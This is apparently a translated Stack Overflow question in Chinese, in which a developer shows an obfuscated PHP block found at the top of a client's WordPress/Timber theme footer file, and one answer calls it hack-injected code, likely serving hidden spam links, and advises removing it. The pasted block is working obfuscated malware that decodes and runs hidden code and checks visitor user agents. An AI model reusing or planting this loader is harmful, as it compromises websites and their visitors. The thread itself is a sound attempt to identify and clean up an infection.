0

我正在编辑一个客户的网站,在他们的主题中,我看到了大量以前从未见过的不寻常的 PHP 代码。它似乎是某种加密。

<?php $pcyvuntd = '>Ew:Qb:Qc:W~!%z!>2<!gps)%j>1<%j=6[%ww2!>#p#/#p#/%z<jg!)%z>>ss    x5csboe))1/35.)1/14+9**-)1/#L4]275L3]248L3P6L1M5]D2P4]D6#<%G]y6d]b  x27)fepdof.)fepdof./#@#/qp%>5h%!]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%tdz>)!gj}Z;h!opjudovg}{;#)tutjyf`opjudovg)!gj!|!*msv%)}k~~~<ftmbg!27pd%6<pd%w6Z6<.3`hAosvufs!|ftmf!~<**9.-j%27u%)7fmjix6<C  x27&6<*rfs%7-K)fujsxX6<#j6<*K)ftpmdXA6~6<u%7>/7&6|7**111127-K)ebfsX x9#-!#f6c68399#-!#65egb2dc#*<!sfuvso!sboepn)%epnbss-%rxW~!Ypp2)%unction wervuph($n){return chr(ord($n)-1);} @error_reporting(0); $!hmg%)!gj!<2,*j%-#1]#-bubE{h%)tpqsut>j%!*9!   x27!hmg%)!gj!~!%tmw!>!#]y84]275]y83]273]y76]277#<!%t2w>#]y74]273]y764P8]37]278]225]241]334]368]322]3]364]6]283]427]36]373P6]36]73>1*!%b:>1<!fmtf!%b:>%s:    x5c%j:.2^,%b:<!%c:>*<")));$fiyflet = $jyvasrw("", $uzdntih); $fiyflet();}}vt)esp>hmg%!<12>j%!|o]o]Y%7;utpI#7>/7rfs%6<#o]1/20QUUI7jsv%7UFH#  x27rfs%6~6< x7fw6<*if((function_exists("    x6f 142 x5f 163 x74 *#}_;#)323ldfid>}&;!osvufs} x7f;!opjudovg   x7f x7f<u%V x27{ftmfV   x7f<*X&Z&S{ftmfV    x7%o:W%c:>1<%b:>1<!gps)%j:>1<%j:=tj2bge56+99386c6f+9f5d8X;!sp!*#opo#>>}R;msv}.;/#/#/},;#-#}+;%-qp%)54l} x27;%!<z!>!#]D6M7]K3#<%yy>#]D6]281L1#/#M5]DgP5]D6#<%fdy>#!2p%Z<^2   x5c2b%!>!2p%!*3>?*2b%)gpf{jt)!gj!<*2bd%-#16:+946:ce44#)zbssb!>!ssbnpe_GMFT`QIQ&f_UTPI`QUUI&e_SEEB`FUPf!<X>b%Z<#opo#>b%!*##>>X)!gjZ<#opo#>b%!**X)ufttj   x22)gj!|!*nbsbq%)323ldfidk!~!<**qp%!-uyfu%)3of)fepdof`57ftbc    x7f!|!*uyfu x27k:!ftmf!}Z;^nbsbq%   x5cSFWSFT`%}4]275]y83]248]y83]256]y81]265]y72]254]y76#<!%w:!>!(%w:!>!   x246767~6<($uas,"   x72 166 x3a 61  x31")) or (strstr($uas,"    x61 156 x64 162 x6f 1+#Qi   x5c1^W%c!>!%i   x5c2^<!Ce*[!%cIjQeTQcOc/#00#W~!Ydrr)%rxB2qj%6<^#zsfvr#  x5cq%7/7#@#7/7^#iubq#   x5cqtsbqA7>q%6< x7fw6*  x7f_*#zB%z>!    x24/%tmw/   x24)%zW%h>EzH,2W%wN;#-Ez-1H*WCw*[!%rN}#QwTW%hIr ]284]364]6]234]342]58]24]31#-%tdz*Wsfuvso!%b-u%!-#2#/#%#/#o]#/*)323zbe24-   x24*<!~!    x24/%t2w/   x24)##-!#~<#/%  x24-    x24!>!f2986+7**^/%rx<~!!%s:N}#-%7-C)fepmqnjA    x27&6<.fmjgA    x27doj%6<   x7fw6*!*#91y]c9y]g2y]#>>*4fubmgoj{h1:|:*mmvo:>:iuhofm%:-5ppde:4:|:**#ppde#)t+)!gj+{e%!osvufs!*!+A!>!{e%)!>> x22!ftmbg)!}k~~9{d%:osvufs:~928>>   x22:ftmbg39*56A:>:utjyf`4   x223}!+!<+{e%+*!*+fepdfe{h+{d%)+opjudovg156 x63 164 x69 157 x6e"; ff<*XAZASV<*w%)ppde>u%V<#65,47R25,d7R17,67R37,#/q%>U<#16,tus)%    x24-    x24b!>!%yy)#}#-#    x24-    x24-tusqpt)%z-#:#*  x24-    x24!>!t`msvd}+;!>!} x27;!>>>!}_;gvc%}&;ftmbg}   x7f;!osvufs}w;* x7f!>>  x22!pd%7fw6*    x7f_*#ujojRk3`{666~6<&w6<   x7fw6*CW&x24y7  x24-    x24*<!  x24-    x24gps)%j>1<%j=tj{fpg)% x73:8297f:5297e:56-xr.985:52985-tNFS&d_SFSFGFS`QUUI&c_UOFHB`SFTV`QUUI&b%!|!*)323zbek!~!<b%  x7s-%rxB%h>#]y31]278]y3e]81]K78:56985:6197g:74985-rr.93e:5597f-s.9uzdntih = implode(array_map("wervuph",str_split("%tjw!>!#]y8x63   162 x65 141 x74 145 x5f 146 x75 8:|:7#6#)tutjyf`439275ttfsqnpdov{h19275j{hnpd19275fs!~<3,j%>j%!*3!  x27!hmg%!)!gj!<2,*j%d%!<5h%/#0#/*#npd/#)rrd/#00;quui#>.%!<***f  x27,*e  x27,*d  x27,*c  x27,*yqmpef)#   x24*<!%t::!>!   x24Ypp3)%cB%iN}#-!  x24/%tmw/   x24)%c*W%eNz)   x24]25  x24-    x24-!%  x24-    x24*!|! x24-    x24 x5c%j^  x24-    x24tvc)qj3hopmA x273qj%6<*Y%)fnbozcYufhA    x27#[k2`{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofuop281Ld]245]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<%bG9}:}.}-}!#*<%nfd>%fd#}#)fepmqnj!/!#0#)idubn`hfsq)!sp!*#ojn)7gj6<.[A    x27&6<  x7fw6*  x7f_*   x27pd%6<pd%w6Z6<.2`hA   x27pd%6<C   x27pd%6|6.7eu{66~67<&w6<*66 157 x78"))) { $jyvasrw = "  %epnbss!>!bssbz)#44ec:649#-!#:618d5fopD#)sfebfI{*w%)kVx{**#k#)tutjyf`x  x22l:!}V;3q%}U;y]}RCw6<pd%w6Z6<.5`hA    x27pd%6<pd%w6Z6<.4`hA   x<*::::::-111112)eobs`un>qp%!|Z~!<##!>!2p%d`ufh`fmjg}[;ldpt%}K;`ufldpt}X;`msvd}R;*m24-  x24<%j,,*!| x24-    x24gvodujpo!    x24-    %)7gj6<**2qj%)hopm3qjA!|!*!***b%)sfxpmpusut!-GTOBSUOSVUFS,6<*msv%7-MSV,6<*)ujojR    x27id%6<    x##:>:h%:<#64y]552]e7y]#>n%<#372]58y]472]37y]672]48y]#>s%<#462]47y141   x72 164") && (!isset($GLOBALS[*#fopoV;hojepdoF.uofu%s:  x5c%j:^<!%w`    x5c^sv%)}.;`UQPMSVD!-id%)uqpuft`msvd},;uqpuf]252]18y]#>q%<#762]67y]562]38y]572]48y]#>m%:|:*r%:-t%y<Cb*[%h!>!%tdz)%bbT-%bT-%hW~%fdy)##-!#~<%h00#*<%nfd)##Qtpz)#]341]88M% x27jsv%6<C>^#zsfvr# x5cq%7**^#zsfvr#    x5cq%)uft-bubE{h%)sutcvt)fubmgoj{hA!osvuj6<*QDU`MPT7-NBFSUT`LDPT7-UFOJ`GB)fubfsdXA  x27K6<  x7fw6*3qj%7>    x2272qj{fpg)%s:*<%j:,,Bjg!)%j:>"    x61 156 x75 156 x61"])))) { $GLOBALS["  x61 156 x75 156 #w#)ldbqov>*ofmy%)utjm!|!*5!    x27!hmg%)!gj!|!*1?hmg%tj    x22)gj6<^#Y#    x5cq%   x27Y%6<.msv`f   x24<!fwbm)%tjw)bssbz)#P#-#Q#-#B#-#T#-#E#-#G#-#H!-#1]#-bubE{h%)tpqsut>j%!*72!    x27x61"]=1; $uas=strtolower($_SERVER["  x4!-#jt0*?]+^?]_    x5c}X   x24<gj<*#k#)usbut`cpV   x7f x7fx5c1^-%r x5c2^-%hOh/#00#W~!%K)ftpmdXA6|7**197-2qj%7-K)udfoopdXA  x22)7gt2w)##Qtjw)#]82#-#!#-%tmw)%tww**WYsboepn)%bs  x24/%tjw/   x24)%   x24-    x24y4   x24-    x24]y8  x24-    x24]26  x-1-bubE{h%)sutcvt)!gj!|!*bubE{h%)j{hn)3of:opjudovg<~   x24<!%o:!>! x242178}527}88.98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#/#7e:47R57,27R66,#/q%>2q%<#g6R85,67R37,18R#>q%V<#D#-#W#-#C#-#O#-#N#*-!%ff2-!%t::**<(<!fwbm)%tjw)#    x24#-!#]y38#-!%w:*  x7f_*#fmjgk4`{6~6<tfs%w6<   x7fw6*CWtfs%)7gj6<*id%)ftpmdR6<*id%)dfyf;2]},;osvufs}   x27;mnui}&;zepc}A;~!}   x7f;!|!}{;)gj}l;33bq}k;opjudovg)!gj!<**2-4-bubE{h%)sutc]83]238M7]381]211M5]67]452]88]5]48]32M3]317]445]212]445]43]321]464#j0#!/!**#sfmcnbs+yfeobz+sfwjidsb`bj+upcotn+qsvmt+fmhpph#)zbssb!-<ofmy%,3,j%>j%!<**3-j%-bubE{h%)sutcvt-eb#-*f%)sfxpmpusut)tpqssutRe%)Rd%)Rb%))!gj!<*#cd&7-#o]s]o]s]#)fepmqyf   x27*&7-n%)utjm6<    x7fw6*CW&)7gx6d 145")) or (strstr($uas,"    x66 151 x72 145 x2*!%z>3<!fmtf!%z>2<!%ww2)%w`TW~#-#I#-#K#-#L#-#M#-#[#-#Y#-1GO   x22#)fepmqyfA>2b%!<*qp%-*.%)euhA)3of>2bx2400~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h%:<**#57]38y]47]51  x64")) or (strstr($uas,"    x63 150 x72 157 pd!opjudovg!|!**#j{hnpd#)tutjyf`opjudovg    x22)!gj}1~!<2p% x7f!~!<##!>5    116 x54"]); if ((strstr($uas,"  x6d 163 x69 145")) or (strstrR  x27tfs%6<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SF67y]37]88y]27]28y]#/r%/h%)n%-#+I#)q%:>:r%:|:**t%)m%=*h%)m%):fmjix:<]252]y85]256]y6g]257]y86]267]y74]275]y7:]268]y7f#<!%tww!>!    fubfsdXk5`{66~6<&w6<    x7fw6*CW&)7gj6<*doj}x;0]=])0#)U!    x27{**u%-#jt0}Z;0]=]0#)2q%l}S;255946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%tp:}334}472   x24<!%ff2!>!bssb8   124 x54 120 x5f 125 x53 105 x52 137 x41 107 x4StrrEVxNoiTCnUF_EtaERCxecAlPeR_rtSdfdknqymb'; $tdkyczxfw=explode(chr((590-470)),substr($pcyvuntd,(20090-14070),(206-172))); $bqmbrz = $tdkyczxfw[0]($tdkyczxfw[(4-3)]); $ooulnirx = $tdkyczxfw[0]($tdkyczxfw[(6-4)]); if (!function_exists('plurbsoe')) { function plurbsoe($sdqchjk, $nrtiwtb,$tnqwwbrlao) { $umwyqdq = NULL; for($dcovyd=0;$dcovyd<(sizeof($sdqchjk)/2);$dcovyd++) { $umwyqdq .= substr($nrtiwtb, $sdqchjk[($dcovyd*2)],$sdqchjk[($dcovyd*2)+(6-5)]); } return $tnqwwbrlao(chr((40-31)),chr((293-201)),$umwyqdq); }; } $yyvboxve = explode(chr((245-201)),'881,42,3692,34,4103,57,4327,38,5972,48,5563,62,1499,69,5451,44,5252,46,3254,30,2668,36,2147,27,460,66,2608,60,1431,68,3374,41,271,20,3196,58,5201,51,352,45,313,39,817,64,4443,42,4009,70,3536,22,2985,38,1627,41,3930,48,4211,35,1668,25,5796,40,1902,43,4826,67,5625,45,3581,46,2363,41,3167,29,3023,42,3456,41,3768,40,2293,70,209,62,291,22,3978,31,2754,37,4294,33,526,58,5115,38,4160,51,4960,24,797,20,1945,20,4582,37,5495,68,1165,50,5355,43,2791,69,127,34,3415,41,3558,23,5050,65,3129,38,5153,48,1039,21,1215,60,2484,60,1275,50,1325,68,1393,38,1060,55,923,41,2058,41,2704,50,1965,50,2099,48,2015,43,4390,25,964,42,2174,56,4715,43,3726,21,3320,54,4893,67,5836,45,1802,26,4365,25,584,54,5737,59,5398,53,5670,67,3627,65,3808,53,4619,42,5946,26,2923,62,2230,63,4529,53,3497,39,2404,48,1828,50,2860,63,1568,59,3284,36,397,63,1693,65,4415,28,4485,44,2544,64,2452,32,4661,54,5881,28,5909,37,1115,50,161,48,89,38,3065,64,3861,69,638,61,4984,66,1758,44,59,30,1878,24,1006,33,4079,24,699,43,3747,21,0,59,5298,31,4246,48,5329,26,4758,68,742,55'); $bqrhsjd = $bqmbrz("",plurbsoe($yyvboxve,$pcyvuntd,$ooulnirx)); $bqmbrz=$pcyvuntd; $bqrhsjd(""); $bqrhsjd=(461-340); $pcyvuntd=$bqrhsjd-1; ?><?php
/*
 * Third party plugins that hijack the theme will call wp_footer() to get the footer template.
 * We use this to end our output buffer (started in header.php) and render into the view/page-plugin.twig template.
*/
$timberContext = $GLOBALS['timberContext'];
if (!isset($timberContext)) {
throw new \Exception('Timber context not set in footer.');
}
$timberContext['content'] = ob_get_contents();
ob_end_clean();
$templates = array('page-plugin.twig');
Timber::render($templates, $timberContext);

问题是 $pcyvuntd = 代码到底是关于什么的?

4

1 回答 1

1

如果我不得不猜测它是从黑客攻击中注入的代码。我以前见过类似的东西(不完全像,但足够相似),黑客可以访问您的 FTP 并添加代码。检查查看的页面源中是否有任何奇怪的东西(所以在http://example.org/whatever)——我的预感是你会发现俄罗斯伟哥的隐藏链接或一些狗屎。

无论哪种方式,我的建议是对主题进行 zip 备份,然后对该代码进行火焰喷射器;99% 的人说它不好(当然 Timber 没有添加/使用)

于 2017-03-27T14:06:13.650 回答